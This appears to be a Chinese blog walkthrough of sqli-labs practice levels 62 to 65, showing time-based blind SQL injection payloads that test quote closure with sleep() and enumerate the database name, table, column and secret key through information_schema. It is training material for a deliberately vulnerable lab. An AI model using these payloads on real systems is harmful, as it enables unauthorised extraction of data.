当前位置: 首页 > news >正文

sqli-labs-master/Less-62~Less-65

Less-62

这一关开始就是使用时间盲注了,并且它规定查130次。

首先,我们判断他的闭合方式。

?id=1')and sleep(3)--%20

页面延时了,说明闭合成功了。

下面我们判断它的数据库名的长度

?id=1')and if(length(database())>10,sleep(1),1)--%20

当长度大于9时,页面延时,大于10时页面不延时,说明数据库的长度为10

?id=1')and if(substr(database(),1,1)='c',sleep(1),1)--%20

截取数据库从第一位开始截取一位,如果是c,则sleep一秒,依次类推,直到判断出数据库的名字为challenges为止。

接下来就是判断表名了。

?id=1')and if(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='m',sleep(3),1)--%20

以此类推,直到判断出表名为止。

接下来爆字段

?id=1')and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='mss5jm6plq' limit 2,1),1,1)='s',sleep(3),1)--%20

下面以此类推,直到判断出需要的字段为止。

下面面爆字段信息

?id=1')and if(substr((select secret_FT6J from mss5jm6plq),1,1)='k',sleep(3),1)--%20

然后,将我们查出来的密钥填到下面。

Less-63

这一关和以前一样,还是先判断闭合

?id=1' and sleep(3)--%20

接下来参考上面即可。

Less-64

?id=1))and sleep(3)--%20

只是闭合方式不同。其他参考上一关即可。

Less-65

?id=1")and sleep(3)--%20

http://www.lryc.cn/news/616259.html

相关文章:

  • 人工智能正在学习自我提升的方式
  • 《算法导论》第 17 章 - 摊还分析
  • 谷歌DeepMind发布Genie 3:通用型世界模型,可生成前所未有多样化的交互式虚拟环境
  • UE什么贴图要关闭SRGB
  • Virtio 驱动初始化数据收发流程详解
  • 太极行业观察:从传统技艺到数字化转型的演变|创客匠人
  • 【R studio数据分析】准备工作——下载安装
  • 【布局适配问题】响应式布局、移动端适配、大屏布局要点
  • 通过sealos工具在ubuntu 24.02上安装k8s集群
  • Loki+Alloy+Grafana构建轻量级的日志分析系统
  • FFmpeg实现音视频转码
  • Spring AOP 底层实现(面试重点难点)
  • AQS(AbstractQueuedSynchronizer)底层源码实现与设计思想
  • 前端路由:Hash 模式与 History 模式深度解析
  • Java Stream流详解:从基础语法到实战应用
  • Rust 实战四 | Traui2+Vue3+Rspack 开发桌面应用:通配符掩码计算器
  • 【算法题】:和为N的连续正数序列
  • 数学建模:控制预测类问题
  • Python 获取对象信息的所有方法
  • matlab实现随机森林算法
  • Doubletrouble靶机练习
  • 点击速度测试:一款放大操作差距的互动挑战游戏
  • #Datawhale AI夏令营#第三期全球AI攻防挑战赛(AIGC技术-图像方向)
  • 如何用分析方法解决工作中的问题?
  • 检索召回率优化探究五(BGE-M3 混合检索):基于LangChain0.3 集成Milvu2.5 向量数据库构建的智能问答系统
  • Linux系统编程Day11 -- 进程属性和常见进程
  • 学习模板元编程(3)enable_if
  • 【树状数组】Dynamic Range Sum Queries
  • [激光原理与应用-221]:设计 - 皮秒紫外激光器 - 常见技术难题、原因与解决方案
  • Linux-静态配置ip地址